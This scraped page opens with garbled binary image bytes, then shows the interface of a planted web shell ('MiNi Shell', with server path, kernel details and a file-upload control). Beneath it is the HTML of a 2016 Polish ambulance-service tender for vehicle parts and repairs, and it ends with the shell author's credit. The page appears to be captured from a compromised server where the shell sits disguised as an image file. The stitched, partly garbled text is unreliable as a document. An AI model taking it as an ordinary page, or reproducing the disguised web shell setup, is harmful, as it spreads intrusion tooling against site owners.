JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160412/38499-N-2016.html

<p class="kh_header"><b>Zielona Góra: Dostawa części zamiennych z usługą naprawy bieżącej i eksploatacyjnej taboru samochodowego</b><br>
<b>Numer ogłoszenia: 38499 - 2016; data zamieszczenia: 12.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzka Stacja Pogotowia Ratunkowego SP ZOZ w Zielonej Górze , ul. Chrobrego 2, 65-043 Zielona Góra, woj. lubuskie, tel. 068 3202225, 3202315, faks 068 3202225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pogotowie.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa części zamiennych z usługą naprawy bieżącej i eksploatacyjnej taboru samochodowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa części zamiennych wraz z usługą naprawy bieżącej i eksploatacyjnej taboru samochodowego (przeglądy, naprawy, konserwacja) dla Wojewódzkiej Stacji pogotowia Ratunkowego SP ZOZ w Zielonej Górze. Opis przedmiotu zamówienia zawiera w szczególności Załącznik nr 8 do SIWZ - Formularz asortymentowo - cenowy oraz Załącznik nr 6 do SIWZ - wzór umowy wraz z wykazem pojazdów Zamawiającego (Załącznik  nr 7 do SIWZ).
Przedmiot zamówienia obejmuje również wykonanie kompleksowych napraw blacharskich i prac lakierniczych pojazdów wymienionych w w/w wykazie wynikających z bieżącego użytkowania, wypadków lub kolizji drogowych oraz prac konserwacyjnych. 
Podczas każdorazowej usługi naprawy/ konserwacji pojazdu w warsztacie, w ramach wynagrodzenia za dane zlecenie, Wykonawca zobowiązuje się do sprawdzenia sprawności, np. szyb, wycieraczek, oświetlenia, hamulców, ciśnienia ogumienia, dokręcenia śrub w kołach.
Wykonawca zobowiązany jest dostarczyć części zamienne fabrycznie nowe, I gatunku, oryginalne (lub odpowiednie zamienniki), produkowanych lub/i zalecanych przez producentów pojazdów, odpowiednio oznakowane, posiadające wymagane prawem certyfikaty z okresem gwarancji zgodnym z gwarancją udzielaną przez danego producenta części. Dopuszcza się możliwość stosowania przez Wykonawcę regenerowanych części zamiennych wyłącznie po wcześniejszym uzgodnieniu tego z Zamawiającym.
Wykonanie naprawy odbywać się będzie w wyniku zlecenia złożonego przez Zamawiającego w sposób uzgodniony przez strony. 
Wymagany okres gwarancji na wykonane naprawy minimum 12 m-cy od daty podpisania protokołu odbioru.
Usługi naprawy będą wykonywane w warsztacie samochodowym, który jest położony w odległości nie większej niż 12 km od siedziby Zamawiającego, tj. od ul. Chrobrego 2 w Zielonej Górze, dostępnym dla Zamawiającego przez co najmniej 12 godzin dziennie w dni robocze, a w soboty przez co najmniej 6 godzin, a także urządzeniami do realizacji niniejszej umowy, posiadającymi niezbędne certyfikaty.
Przed podjęciem czynności związanych z naprawą Wykonawca zobowiązuje się poinformować Zamawiającego o szacowanych kosztach naprawy pojazdów (koszty usługi oraz części zamiennych, w tym m.in. podanie typu oraz producenta części - w celu zweryfikowania ceny). Zaakceptowany przez Zamawiającego kosztorys z określeniem (zakresu naprawy/remontu) wstępnej wyceny oraz wystawione zlecenie wykonania usługi naprawy samochodu są warunkiem przyjęcia pojazdu do naprawy.
Wykonawca bezpośrednio po otrzymaniu zlecenia od Zamawiającego zobowiązany jest do bezzwłocznego przyjęcia pojazdu/ambulansu i przystąpienia do jego naprawy w przeciągu 1 godziny od otrzymania zlecenia, jak również dołożyć wszelkich starań do zminimalizowania czasu naprawy.
W przypadku stwierdzenia w pojeździe innych niż zgłaszane nieprawidłowości, Wykonawca zobowiązany jest przekazać Zamawiającemu pisemną adnotację o tych nieprawidłowościach/usterkach wraz z określeniem terminów, w jakich powinny być one ujęte. 
Wykonawca zobowiązany jest do utylizacji zużytego niesprawnego do użycia sprzętu/części pochodzących z niesprawnych pojazdów Zamawiającego (w tym opon), zgodnie z obowiązującymi w tym zakresie przepisami oraz przekazać Zamawiającemu pisemny dowód utylizacji.
Strony dopuszczają możliwość dokonania napraw z wykorzystaniem części zakupionych bezpośrednio przez Zamawiającego - w szczególności w sytuacjach, gdy Zamawiający będzie miał możliwość ich nabycia w cenach niższych od oferowanych przez Wykonawcę. W takim przypadku wynagrodzenie, przysługuje Wykonawcy, będzie obejmować koszty związane tylko z samymi czynnościami naprawy (bez części).
W szczególności, w przypadku awarii samochodu, bez możliwości jego uruchomienia, Wykonawca dokona naprawy pojazdu w miejscu jego awarii lub odholuje do miejsca naprawy z przestrzeganiem procedur obowiązujących w prawie o ruchu drogowym i przystąpi niezwłocznie do naprawy. Zamawiający oczekuje, aby również w innych przypadkach, kiedy Zamawiający nie ma możliwości dostarczenia pojazdu do Wykonawcy lub jego odebrania od Wykonawcy, Wykonawca odebrał/dostarczył pojazd odpowiednio na miejsce.
W trakcie wykonywania przeglądów okresowych i obsługi technicznej, oprócz czynności zawartych w instrukcji obsługi dla danej marki i typu ambulansu, Wykonawca zobowiązany jest przeprowadzić komputerowe badanie pojazdu na ścieżce diagnostycznej z jednoczesnym załączeniem wydruków.
Wykonanie innych napraw niż w/w w zakresie napraw karoserii i zabudowy ambulansu wg zlecenia Zamawiającego.
Wykonanie dodatkowych, niezgłoszonych czynności naprawczych powinno być skonsultowane z upoważnionym przedstawicielem Zamawiającego.
Od momentu przejęcia przez osobę upoważnioną z ramienia Wykonawcy, Wykonawca przejmuje odpowiedzialność za przekazanie pojazdu oraz jego wyposażenie. Wykonawca ponosi odpowiedzialność (ryzyko, utraty, uszkodzenia itp.) za pojazdy od czasu ich przyjęcia do naprawy do czasu przekazania Zamawiającemu.
Wykonawca naprawy jest zobowiązany do przekazania naprawionego pojazdu w stanie czystości i porządku.
Liczba pojazdów/ambulansów podlegających obsłudze w ramach niniejszego zamówienia może ulec zmianie, tj. zwiększeniu lub zmniejszeniu w okresie trwania umowy. Ponadto, Zamawiający informuje, że ilości wskazane w Opisie przedmiotu zamówienia / Formularzu asortymentowo - cenowym są ilościami przewidywanymi i w czasie trwania umowy mogą ulec zmianie. Tym samym, Zamawiający zastrzega sobie prawo ograniczenia ilości w zakresie poszczególnych asortymentów część/ usług, łącznie z możliwością całkowitej rezygnacji z zakupu poszczególnych części / usług na każdym etapie obowiązywania umowy - w zależności od zapotrzebowania Zamawiającego. Takiej sytuacji, Wykonawcy nie przysługują żadne roszczenia z tytułu zmiany zakresu przedmiotu zamówienia. 
Zamawiający zastrzega sobie prawo do kontroli podczas wykonywanej naprawy i obsługi technicznej samochodu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.32.00.00-6, 34.31.20.00-7, 50.11.00.00-9, 50.11.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnego warunku w tym zakresie i dokona oceny jego spełnienia na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 ustawy Pzp.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w oparciu o regułę spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnego warunku w tym zakresie i dokona oceny jego spełnienia na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 ustawy Pzp.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w oparciu o regułę spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnego warunku w tym zakresie i dokona oceny jego spełnienia na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 ustawy Pzp.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w oparciu o regułę spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnego warunku w tym zakresie i dokona oceny jego spełnienia na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 ustawy Pzp.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w oparciu o regułę spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnego warunku w tym zakresie i dokona oceny jego spełnienia na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, zgodnie z art. 22 ust. 1 ustawy Pzp.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w oparciu o regułę spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-Wypełniony Formularz ofertowy - (wzór - Załącznik nr 1 do SIWZ).
-Wypełniony Formularz asortymentowo - cenowy - (wzór - Załącznik nr 8 do SIWZ (Excel: Arkusze I II i III). 
-Wypełniony Formularz asortymentowo - cenowy Wykonawca dołączy do oferty również w formie płyty CD lub DVD. Informacje załączone na płycie powinny być zgodne co do treści z wydrukowanym Formularzem cenowym, załączonym do oferty.
- Wykaz warsztatów, w których będą realizowane naprawy (wzór - Załącznik nr 9 do SIWZ
- W przypadku zastrzeżenia informacji stanowiących tajemnicę przedsiębiorstwa Wykonawca złoży oświadczenie, którego wzór stanowi Załącznik nr 5 do SIWZ.
Zamawiający uzna informacje zastrzeżone przez Wykonawcę za tajemnicę przedsiębiorstwa zgodnie z kryteriami określonym w art. 11 ust. 4 ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (tekst jednolity: Dz. U. z 2003 r. Nr 153, poz. 1503 z późn. zm.), o ile Wykonawca nie później niż w terminie składania ofert lub wniosków wykaże, że:
a) zastrzeżone informacje stanowią informacje techniczne, technologiczne, organizacyjne przedsiębiorstwa lub inne nieujawnione do wiadomości publicznej;
b) zastrzeżone informacje posiadają wartość gospodarczą;
c) podjął działania niezbędne do zachowania poufności zastrzeżonych informacji i opisze te działania.
Niezałączenie przez Wykonawcę oświadczenia zostanie uznane, jako brak woli utajnienia jakichkolwiek danych składających się na ofertę. 
- Pełnomocnictwo w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza, o ile umocowanie do reprezentowania Wykonawcy nie wynika z innych dokumentów załączonych przez Wykonawcę. 
- Pełnomocnictwo wykonawców wspólnie ubiegających się o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Cena brutto za 1 roboczogodzinę usług nietypowych - 10</li>
<li>3 - Rabat od cen katalogowych Wykonawcy na części użyte do wykonania usług nietypowych - 10</li>
<li>4 - Gwarancja na wykonane naprawy od daty podpisania protokołu odbioru w miesiącach - 10</li>
<li>5 - Dysponowanie komputerowym programem  obsługującym pojazdy Mercedes-Benz w zakresie kompleksowej diagnostyki - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza zmiany umowy zgodnie z art. 144 Pzp w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zakresie:
1.1.	zmian wysokości wynagrodzenia wynikających ze zmiany przepisów prawa (np. zmiana stawki podatku VAT);
1.2.	zmiany sposobu spełnienia świadczenia w przypadku, gdy:
a)	będzie to konieczne ze względu na zapewnienie bezpieczeństwa lub zapobieżeniu awarii,
b)	będzie to konieczne ze względu na zmianę przepisów prawa,
c)	usprawni realizacje dostaw,
d)	poprawi efektywność wykonywania przedmiotu umowy,
e)	zmiana pozostaje w związku z koniecznością realizacji postulatów osób trzecich nieuwzględnionych na etapie podpisania Umowy, a ze względów społecznych koniecznych do spełnienia.
1.3.	zmian zakresu świadczenia usług wynikających ze zwiększenia lub zmniejszenia ilości pojazdów spowodowanych zmianami organizacyjnymi w jednostce Zamawiającego.
1.4.	Zmian części zamiennych wskazanych w Formularzu asortymentowo - cenowym, w przypadku ich obiektywnej niedostępności. 
1.5.	zmian w przypadku wystąpienia siły wyższej, uniemożliwiającej wykonanie przedmiotu Umowy. 
2.	Zmiana warunków umowy może nastąpić tylko na podstawie zawartego pisemnego aneksu między stronami niniejszej umowy.

3.	Nie stanowi zmiany Umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych w szczególności:
a)	zmiana danych związanych z obsługą administracyjno - organizacyjną umowy,
b)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pogotowie.zgora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzka Stacja Pogotowia Ratunkowego 
Samodzielny Publiczny Zakład Opieki Zdrowotnej
ul. Bolesława Chrobrego 15
65-043 Zielona Góra.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2016 godzina 11:00, miejsce: Wojewódzka Stacja Pogotowia Ratunkowego 
Samodzielny Publiczny Zakład Opieki Zdrowotnej
ul. Bolesława Chrobrego 15
65-043 Zielona Góra
Kadry.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com